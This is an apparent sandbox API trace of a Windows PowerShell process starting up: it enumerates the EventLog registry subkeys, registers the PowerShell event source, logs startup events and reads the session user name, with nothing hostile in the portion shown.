	[0538.457] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x5, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.457] CoTaskMemFree (pv=0x3838e0) 
	[0538.457] CoTaskMemFree (pv=0x0) 
	[0538.457] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.457] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x6, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.457] CoTaskMemFree (pv=0x3838e0) 
	[0538.457] CoTaskMemFree (pv=0x0) 
	[0538.457] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.457] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x7, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.457] CoTaskMemFree (pv=0x3838e0) 
	[0538.457] CoTaskMemFree (pv=0x0) 
	[0538.457] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.457] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x8, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.457] CoTaskMemFree (pv=0x3838e0) 
	[0538.457] CoTaskMemFree (pv=0x0) 
	[0538.457] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x34c) returned 0x0
	[0538.457] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.458] RegOpenKeyExW (in: hKey=0x348, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x350) returned 0x0
	[0538.458] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.458] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x354) returned 0x0
	[0538.458] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.458] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x358) returned 0x0
	[0538.458] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.458] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x35c) returned 0x0
	[0538.458] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.458] RegOpenKeyExW (in: hKey=0x348, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x360) returned 0x0
	[0538.459] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.459] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x364) returned 0x0
	[0538.459] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.459] RegOpenKeyExW (in: hKey=0x348, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x368) returned 0x0
	[0538.459] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.459] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x36c) returned 0x0
	[0538.459] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x370) returned 0x0
	[0538.459] RegCloseKey (hKey=0x370) returned 0x0
	[0538.460] RegCloseKey (hKey=0x348) returned 0x0
	[0538.460] RegCloseKey (hKey=0x36c) returned 0x0
	[0538.461] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x36c) returned 0x0
	[0538.461] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ecedc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ecedc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.461] CoTaskMemFree (pv=0x0) 
	[0538.461] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.461] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.461] CoTaskMemFree (pv=0x3838e0) 
	[0538.461] CoTaskMemFree (pv=0x0) 
	[0538.461] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.461] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.461] CoTaskMemFree (pv=0x3838e0) 
	[0538.461] CoTaskMemFree (pv=0x0) 
	[0538.461] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.461] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.461] CoTaskMemFree (pv=0x3838e0) 
	[0538.461] CoTaskMemFree (pv=0x0) 
	[0538.461] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.462] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.462] CoTaskMemFree (pv=0x3838e0) 
	[0538.462] CoTaskMemFree (pv=0x0) 
	[0538.462] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.462] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.462] CoTaskMemFree (pv=0x3838e0) 
	[0538.462] CoTaskMemFree (pv=0x0) 
	[0538.462] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.462] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.462] CoTaskMemFree (pv=0x3838e0) 
	[0538.462] CoTaskMemFree (pv=0x0) 
	[0538.462] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.462] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.462] CoTaskMemFree (pv=0x3838e0) 
	[0538.462] CoTaskMemFree (pv=0x0) 
	[0538.462] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.462] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.463] CoTaskMemFree (pv=0x3838e0) 
	[0538.463] CoTaskMemFree (pv=0x0) 
	[0538.463] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.463] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.463] CoTaskMemFree (pv=0x3838e0) 
	[0538.463] CoTaskMemFree (pv=0x0) 
	[0538.463] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x348) returned 0x0
	[0538.463] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.463] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x370) returned 0x0
	[0538.463] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.463] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x374) returned 0x0
	[0538.463] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.464] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x378) returned 0x0
	[0538.464] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.464] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x37c) returned 0x0
	[0538.464] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.464] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x380) returned 0x0
	[0538.464] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.464] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x384) returned 0x0
	[0538.464] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.464] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x388) returned 0x0
	[0538.465] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0538.465] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x38c) returned 0x0
	[0538.465] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x390) returned 0x0
	[0538.465] RegCloseKey (hKey=0x390) returned 0x0
	[0538.465] RegCloseKey (hKey=0x36c) returned 0x0
	[0538.466] RegCloseKey (hKey=0x38c) returned 0x0
	[0538.467] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x38c) returned 0x0
	[0538.467] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1eceac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecea8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1eceac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecea8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.467] CoTaskMemFree (pv=0x0) 
	[0538.467] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.467] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x3838e0, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.467] CoTaskMemFree (pv=0x3838e0) 
	[0538.467] CoTaskMemFree (pv=0x0) 
	[0538.467] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.468] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x3838e0, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.468] CoTaskMemFree (pv=0x3838e0) 
	[0538.468] CoTaskMemFree (pv=0x0) 
	[0538.468] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.468] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x3838e0, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.468] CoTaskMemFree (pv=0x3838e0) 
	[0538.468] CoTaskMemFree (pv=0x0) 
	[0538.468] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.468] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x3838e0, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.468] CoTaskMemFree (pv=0x3838e0) 
	[0538.468] CoTaskMemFree (pv=0x0) 
	[0538.468] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.468] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x3838e0, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.468] CoTaskMemFree (pv=0x3838e0) 
	[0538.468] CoTaskMemFree (pv=0x0) 
	[0538.468] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.468] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x3838e0, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.469] CoTaskMemFree (pv=0x3838e0) 
	[0538.469] CoTaskMemFree (pv=0x0) 
	[0538.469] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.469] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x3838e0, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.469] CoTaskMemFree (pv=0x3838e0) 
	[0538.469] CoTaskMemFree (pv=0x0) 
	[0538.469] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.469] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x3838e0, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.469] CoTaskMemFree (pv=0x3838e0) 
	[0538.469] CoTaskMemFree (pv=0x0) 
	[0538.469] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.469] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x3838e0, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.469] CoTaskMemFree (pv=0x3838e0) 
	[0538.469] CoTaskMemFree (pv=0x0) 
	[0538.469] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x36c) returned 0x0
	[0538.469] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0538.470] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x390) returned 0x0
	[0538.470] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0538.470] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x394) returned 0x0
	[0538.470] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0538.470] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x398) returned 0x0
	[0538.470] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0538.470] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x39c) returned 0x0
	[0538.470] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0538.470] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x3a0) returned 0x0
	[0538.471] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0538.471] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x3a4) returned 0x0
	[0538.471] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0538.471] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x3a8) returned 0x0
	[0538.471] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0538.471] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x3ac) returned 0x0
	[0538.471] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x3b0) returned 0x0
	[0538.472] RegCloseKey (hKey=0x3b0) returned 0x0
	[0538.472] RegCloseKey (hKey=0x38c) returned 0x0
	[0538.472] RegCloseKey (hKey=0x3ac) returned 0x0
	[0538.477] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8e0008
	[0539.484] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x357b950*="WSMan", lpRawData=0x357b6c0) returned 1
	[0539.486] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0539.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0539.486] CoTaskMemFree (pv=0x1b6e49c0) 
	[0539.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.488] CoTaskMemAlloc (cb=0x804) returned 0x1b708ae0
	[0539.488] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b708ae0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0539.488] CoTaskMemFree (pv=0x1b708ae0) 
	[0539.488] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0539.488] GetUserNameW (in: lpBuffer=0x3838e0, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0539.489] CoTaskMemFree (pv=0x3838e0) 
	[0539.489] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3580e88*="Alias", lpRawData=0x3580c18) returned 1
	[0539.490] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0539.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0539.491] CoTaskMemFree (pv=0x1b6e49c0) 
	[0539.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
